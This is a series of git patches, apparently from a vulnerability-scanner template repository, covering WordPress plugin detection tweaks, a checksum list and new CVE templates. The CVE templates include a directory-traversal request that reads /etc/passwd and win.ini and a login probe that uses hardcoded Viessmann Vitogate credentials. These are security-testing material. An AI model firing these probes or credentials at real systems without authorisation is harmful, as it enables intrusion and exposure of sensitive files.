4a0a0047304502204f0750ca607f0c0428e69b3a7b7969b1af4e3b10711c0abc4cf71808ce1ff038022100901c1be8a746192071e89ebb86342654ecb56d087334476bf793dd1817399a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 95e4dde105..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a32a676c22f77dffd916baae0a6ffa8dd5aed2ef342971a32f1bbdf92ec7ed1402205d4371307a1b07bb9eb4bca37ee93dccc6e23e3458305dd2d8d83f048b2a647a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 1c448241fd..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e5dce5ef886264b580ca7bd59873d6df723d8bf0e78169eacbc2b8911dd347d02205c03c2025ff6671371f9a3a42d3612cc8397e27e749c44b9a7c052800002fb38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index b74289a1d8..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210097bd73cf6bf242e2e7a0d874bc181caa1522e014d4e996d6edbed54200b7b59c02202b18b48a8b598caa9e91831f2118f24644622b2775246678d4e42c63a15f97cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 402b3144d7..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b72b57e8cfcfd856626bc2b82cf3819699ac09a9336443ebb60049b16359d4d402210091fddcef8ecbfca20e4da7990775579bf80e92f781f5ff36956411da4d6063f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 37e9021542..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205a36b79490a0952be5a36f3b4af5f6f18e3c067e1af437b9191e35842243c80d0221009e807d8d39b16922a4d0177ef5b8c4996b2a3af1967712abad823c2fa3035455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 50c44fa11d..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206a71e6549526a5bdb50e56f1b813333ea178d733ee1c2c1654011665e3d0f98e02204485db03ece9e2ad77033c8b6e0803ff2afd6aca5d0d8003e10d37c63b0b9077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 5cc3ad8bc0..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220197e2e656c811f5ae042a18c3f39bf05caf061a68dbc3341e54a2ebde6c3bf84022100cd190e89abb97787c8f79e0f009fa85b22f435b9ee6e575e9277f3406fd8b727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 0f1c0f5fba..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b5b29d251ec4477c850a45bd6ec8be81d2ca46434c2b0f7703d0b8e95e06be402202b2ce4c9a42b2654f5a81aef8cb18be32380c07f4ea6c822cee4d9e5d1501c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index a3efd152dc..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000ce519b162235c0f2ca825ef0c2cf2172ce8645fd54d9810979028004090374022012621c4f5af19e263feccc8017523dff469b16842b10992d5a64e6ea33cb906c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4dd97b3170d31acf8063ff39d5a85d48a3780bfc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 30 Jul 2024 09:56:28 +0700 Subject: [PATCH 1731/1841] Update CVE-2024-5217.yaml --- http/cves/2024/CVE-2024-5217.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index a82ea1a866..fb00a89d02 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -23,7 +23,7 @@ info: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" - tags: cve,cve2024,servicenow,rce + tags: cve,cve2024,servicenow,rce,kev http: - raw: @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd7021d66da3ea62115899f8a80baafb14308996dd48db662b8f97f06ec9a478022100b2401925d9ebe433c7487e337c23f056a15aa00a9e243fed3206122d7736976e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd7021d66da3ea62115899f8a80baafb14308996dd48db662b8f97f06ec9a478022100b2401925d9ebe433c7487e337c23f056a15aa00a9e243fed3206122d7736976e:922c64590222798bb761d5b6d8e72950 From b798cf6b1c9f50c1cf9ee1047f13ee48f88966f4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 30 Jul 2024 09:56:59 +0700 Subject: [PATCH 1732/1841] Update CVE-2024-4879.yaml --- http/cves/2024/CVE-2024-4879.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 673df20aa5..4957c2a65b 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -23,7 +23,7 @@ info: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" - tags: cve,cve2024,servicenow,ssti + tags: cve,cve2024,servicenow,ssti,kev http: - raw: @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205fffb19b088bd6aacae4eff5e3e51db761eda582f4957a4863f4865611e45f570221009cff96f5dc1de26ba5a1c59fb1b01f53e7232c87aaba8322b8439f45d687b9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205fffb19b088bd6aacae4eff5e3e51db761eda582f4957a4863f4865611e45f570221009cff96f5dc1de26ba5a1c59fb1b01f53e7232c87aaba8322b8439f45d687b9f0:922c64590222798bb761d5b6d8e72950 From 82bf13236119675d59ddc6d6d058ddafd84165e0 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Tue, 30 Jul 2024 14:09:56 +0800 Subject: [PATCH 1733/1841] Create CVE-2022-27043 --- http/cves/2022/CVE-2022-27043 | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2022/CVE-2022-27043 diff --git a/http/cves/2022/CVE-2022-27043 b/http/cves/2022/CVE-2022-27043 new file mode 100644 index 0000000000..6cfff057b8 --- /dev/null +++ b/http/cves/2022/CVE-2022-27043 @@ -0,0 +1,32 @@ +id: CVE-2022-27043 + +info: + name: Yearning Directory Traversal + author: Co5mos + severity: high + description: | + Yearning has a directory traversal vulnerability that can be exploited by attackers to obtain sensitive information. The vulnerability is present in multiple versions of Yearning. + metadata: + fofa-query: 'app="Yearning"' + tags: yearning, lfi + +http: + - method: GET + path: + - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd" + - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + + - type: regex + part: body + regex: + - "root:.*:0:0" From 7cd8273a06b2e19bfc39d4d8c2224037291442a3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 11:57:26 +0530 Subject: [PATCH 1734/1841] Update CVE-2022-27043 --- http/cves/2022/CVE-2022-27043 | 38 +++++++++++++++++++++-------------- 1 file changed, 23 insertions(+), 15 deletions(-) diff --git a/http/cves/2022/CVE-2022-27043 b/http/cves/2022/CVE-2022-27043 index 6cfff057b8..5a4054d67d 100644 --- a/http/cves/2022/CVE-2022-27043 +++ b/http/cves/2022/CVE-2022-27043 @@ -1,14 +1,29 @@ id: CVE-2022-27043 info: - name: Yearning Directory Traversal + name: Yearning - Directory Traversal author: Co5mos severity: high description: | Yearning has a directory traversal vulnerability that can be exploited by attackers to obtain sensitive information. The vulnerability is present in multiple versions of Yearning. + reference: + - https://github.com/jimdx/YEARNING-CVE-2022-27043/blob/main/README.md + - http://yearning.io/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-27043 + cwe-id: CWE-22 + epss-score: 0.00238 + epss-percentile: 0.62311 + cpe: cpe:2.3:a:yearning:yearning:*:*:*:*:*:*:*:* metadata: - fofa-query: 'app="Yearning"' - tags: yearning, lfi + verified: true + max-request: 1 + vendor: yearning + product: yearning + fofa-query: app="Yearning" + tags: cve,cve2022,yearning,lfi http: - method: GET @@ -16,17 +31,10 @@ http: - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd" - "{{BaseURL}}/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini" - matchers-condition: or matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" + - type: dsl + dsl: + - "regex('root:.*:0:0:', body) || contains_all(body, '[fonts]', 'for 16-bit app support')" + - "contains(content_type, 'text/plain')" + - "status_code == 200" condition: and - - - type: regex - part: body - regex: - - "root:.*:0:0" From e72b8e49ef6ea387d02c6c01a2dc199ce7dd0fe6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jul 2024 12:04:02 +0530 Subject: [PATCH 1735/1841] minor-update --- http/cves/2024/CVE-2024-6366.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6366.yaml b/http/cves/2024/CVE-2024-6366.yaml index 43abcd8940..b805501b51 100644 --- a/http/cves/2024/CVE-2024-6366.yaml +++ b/http/cves/2024/CVE-2024-6366.yaml @@ -18,7 +18,7 @@ info: product: user-profile-builder framework: wordpress publicwww-query: "/wp-content/plugins/profile-builder" - tags: cve,cve2024,wpscan,file-upload + tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder flow: http(1) && http(2) From 2f9db30d7a2ac80b94dea8f98f823a497997f3fb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 12:37:21 +0530 Subject: [PATCH 1736/1841] Create CVE-2023-5222.yaml --- http/cves/CVE-2023-5222.yaml | 69 ++++++++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 http/cves/CVE-2023-5222.yaml diff --git a/http/cves/CVE-2023-5222.yaml b/http/cves/CVE-2023-5222.yaml new file mode 100644 index 0000000000..5068ade726 --- /dev/null +++ b/http/cves/CVE-2023-5222.yaml @@ -0,0 +1,69 @@ +id: CVE-2023-5222 + +info: + name: Viessmann Vitogate 300 - Hardcoded Password + author: ritikchaddha + severity: critical + description: | + A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface. + impact: | + An attacker could potentially gain unauthorized access to the device. + remediation: | + Update the device firmware to remove the hardcoded password or change it to a strong, unique password. + reference: + - https://vuldb.com/?ctiid.240364 + - https://vuldb.com/?id.240364 + - https://nvd.nist.gov/vuln/detail/CVE-2023-5222 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-5222 + cwe-id: CWE-259 + epss-score: 0.00164 + epss-percentile: 0.52433 + cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + shodan-query: title:"Vitogate 300" + fofa-query: title="Vitogate 300" + vendor: viessmann + product: vitogate_300_firmware + tags: cve,cve2023,viessmann,vitogate,default-login + +http: + - raw: + - | + POST /cgi-bin/vitogate.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}} + + attack: pitchfork + payloads: + username: + - vitomaster + - vitogate + password: + - viessmann1917 + - viessmann + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'admin":true' + - '"sessionId":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 From ef3b6d48694056f468b8cac9956430e1df3284f1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 12:43:53 +0530 Subject: [PATCH 1737/1841] updated matcher --- http/cves/2024/CVE-2024-6922.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index c8e54f7bcb..8ea93b506f 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -6,10 +6,12 @@ info: severity: high description: | Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component. - impact: An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server. + impact: | + An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server. reference: - https://www.automationanywhere.com/products/automation-360 - https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6922 metadata: verified: true max-request: 1 @@ -33,6 +35,11 @@ http: words: - "dns" + - type: word + part: body + words: + - '{"message":' + - type: word part: content_type words: From bd6fc6e48ba7503f3c170ca224687ebcc30e2692 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 12:45:44 +0530 Subject: [PATCH 1738/1841] Update quickcms-installer.yaml --- http/misconfiguration/installer/quickcms-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/quickcms-installer.yaml b/http/misconfiguration/installer/quickcms-installer.yaml index dee1d42dd6..995f6539d8 100644 --- a/http/misconfiguration/installer/quickcms-installer.yaml +++ b/http/misconfiguration/installer/quickcms-installer.yaml @@ -24,11 +24,6 @@ http: words: - "QuickCMS Installation" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From cebc688fe18550d1014d525e8d02913d54582222 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jul 2024 12:53:27 +0530 Subject: [PATCH 1739/1841] Update CVE-2024-7188.yaml --- http/cves/2024/CVE-2024-7188.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-7188.yaml b/http/cves/2024/CVE-2024-7188.yaml index 6cfbbddd7d..342f574e46 100644 --- a/http/cves/2024/CVE-2024-7188.yaml +++ b/http/cves/2024/CVE-2024-7188.yaml @@ -8,10 +8,9 @@ info: A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database. reference: - https://cvefeed.io/vuln/detail/CVE-2024-7188 - - https://vuldb.com/?id.272609 - https://github.com/bigb0x/CVEs/blob/main/quicklancer-2-4.md - https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135 - - https://vuldb.com/?ctiid.272609 + - https://nvd.nist.gov/vuln/detail/CVE-2024-7188 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 @@ -39,7 +38,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"og:site_name","og:locale","range2")' - - 'contains(content_type,"text/html")' - 'status_code == 200' + - 'contains(content_type,"text/html")' + - 'contains_all(body,"og:site_name","og:locale","range2")' condition: and From 77b1a28ccd766aeb9a2b21c7a831e9ab7888ebb5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 30 Jul 2024 07:23:48 +0000 Subject: [PATCH 1740/1841] Auto Generated New Template Addition List [Tue Jul 30 07:23:48 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 319a9a0f92..2aaead52ec 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,8 @@ http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-6205.yaml +http/cves/2024/CVE-2024-6922.yaml http/misconfiguration/deployment-interface-exposed.yaml +http/misconfiguration/installer/quickcms-installer.yaml http/osint/user-enumeration/substack.yaml http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml From 9a413f7bee6fe86a77b797a14526b37f0107ac42 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 30 Jul 2024 07:23:53 +0000 Subject: [PATCH 1741/1841] Auto Generated Templates Checksum [Tue Jul 30 07:23:53 UTC 2024] :robot: --- templates-checksum.txt | 428 +++++++++++++++++++++-------------------- 1 file changed, 215 insertions(+), 213 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5bd05f1159..a10e448da1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3,6 +3,7 @@ CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 README.md:8fb672d947ae8f5cca6afdb23adf9c1a2bc63de8 +README_JA.md:1d51d07fc938a8a01ea25cf9226137e539308274 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 TEMPLATES-STATS.json:d82fcd54d29434a7b0b0f30d5b68e84f217679bd TEMPLATES-STATS.md:3bab59f5fe6be0ed5e30b20d477874d05270b75f @@ -755,7 +756,7 @@ helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8c helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:4817cb4528a6e4857fb571db95197ba2033c4fc1 helpers/wordpress/plugins/broken-link-checker.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 -helpers/wordpress/plugins/chaty.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 +helpers/wordpress/plugins/chaty.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:a3240fca0b8eb2f46dc3168aa05f2447def6cb09 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -779,7 +780,7 @@ helpers/wordpress/plugins/custom-fonts.txt:bcfa1e591aab992fff773d6a0dc4bb58433d2 helpers/wordpress/plugins/custom-post-type-ui.txt:4bfe61fd9e7ec461ff91963632ff470bd1264c1a helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 -helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 +helpers/wordpress/plugins/duplicate-page.txt:c416ba697fb14daa8c8cab952e0e263fa948a93a helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/duplicator.txt:78c1f7ff53f4bd87518687e48914ce6c53a69f17 helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:68c9b7f7107e58a492677237912410e7d28c994b @@ -806,9 +807,9 @@ helpers/wordpress/plugins/forminator.txt:bc78bd77fb0b7968fa063868c2ab8461de5d9da helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:cf32739ccdf9900e27611336c93027a7d59f0e18 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:0ff943418641a5443653f90ce6951a93e9770070 -helpers/wordpress/plugins/google-analytics-for-wordpress.txt:51e5b4744f672fbc75ac2043bb18ffd8d1d563c3 +helpers/wordpress/plugins/google-analytics-for-wordpress.txt:d221ed6fdf5eb7524565cb7b691ea3effdcfb637 helpers/wordpress/plugins/google-listings-and-ads.txt:67c391fdae5d34abde64a1732ca064007569702b -helpers/wordpress/plugins/google-site-kit.txt:3fc4f3215f2c02622f980d28a4791bcc6857a95e +helpers/wordpress/plugins/google-site-kit.txt:a482deab175f9503a82b6e39521df665b32e2d13 helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:c0b7132c131b0bc84961d92e38abb3eb41c6eb80 @@ -821,7 +822,7 @@ helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa752820 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 helpers/wordpress/plugins/hostinger.txt:9d58b49dc32ab6a8591bb2ce2c9a3a4748e7f41d -helpers/wordpress/plugins/image-optimization.txt:a9ec402f06cdb367cb4ecd9d221265dbc42431cf +helpers/wordpress/plugins/image-optimization.txt:29cd3f50fdf56b43132cb011be27e5a2567b76ae helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/insert-headers-and-footers.txt:595d550379b2cb8bccb9659627308ff4e751d23f @@ -835,7 +836,7 @@ helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:839a647433a9f8e27202a54029166cf00ce88b97 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4a68a369b09b39005e13232e5dfd62ba1526b55d helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/litespeed-cache.txt:03c10c50990743199cc887aaacd3f88a0a0a026e +helpers/wordpress/plugins/litespeed-cache.txt:d7e0975ab636bd2ca6c294daa1b48c4948498114 helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/loginizer.txt:57f75e869bf26cdb7eaddcd7bb1de6cfbb0594c3 helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e00 @@ -853,7 +854,7 @@ helpers/wordpress/plugins/ml-slider.txt:75c024ece33c58576c793ad8930682e902abfb64 helpers/wordpress/plugins/newsletter.txt:1367078ebee3d42232e6c2aaa74f83439f5d235e helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:b4965036e178930c67affe46a8868c680bc27ea4 -helpers/wordpress/plugins/ninja-forms.txt:ff91f6a12c5b5d9b3000e730864aa8f2141aa975 +helpers/wordpress/plugins/ninja-forms.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b @@ -865,7 +866,7 @@ helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:b43a7e746239a620873eb1cafebc00275628d25d helpers/wordpress/plugins/pixelyoursite.txt:eed99d45d85b51d535a8ee871f49622ae2ab39c6 -helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 +helpers/wordpress/plugins/polylang.txt:ded24367ba96a591530ae7476faefb646d5c84a2 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:c25ed33c251bfc15583cad11462f17a56e46989d helpers/wordpress/plugins/post-smtp.txt:aecdd619817528f6e7764e982d8df1aafa8a7175 @@ -873,7 +874,7 @@ helpers/wordpress/plugins/post-types-order.txt:47ac56ccfa5b6db61c32cb48c2dda8cc6 helpers/wordpress/plugins/premium-addons-for-elementor.txt:7db99b25d0e8a75cbf61dc7a01d2b96a266ef77b helpers/wordpress/plugins/pretty-link.txt:bd97de79166e7cff400d017959304a14efc7d502 helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec -helpers/wordpress/plugins/really-simple-ssl.txt:d97823538c9ba6289bac6fea78445ad90770264d +helpers/wordpress/plugins/really-simple-ssl.txt:c9d80c377a036d155be198abbb91a3fb1d887536 helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:dfd43a95dc2d1f037030918b6e7e05f995699d46 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 @@ -927,13 +928,13 @@ helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb184 helpers/wordpress/plugins/woocommerce-services.txt:d5191657a84fc8d54327e42ccdc17707f97bfa90 helpers/wordpress/plugins/woocommerce.txt:5f0c754f4b89e8b4c936d6e763baf5d8054deca7 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da -helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 +helpers/wordpress/plugins/wordfence.txt:7d5d84b80da9e3d4c2d32c2189c3db70dad17667 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 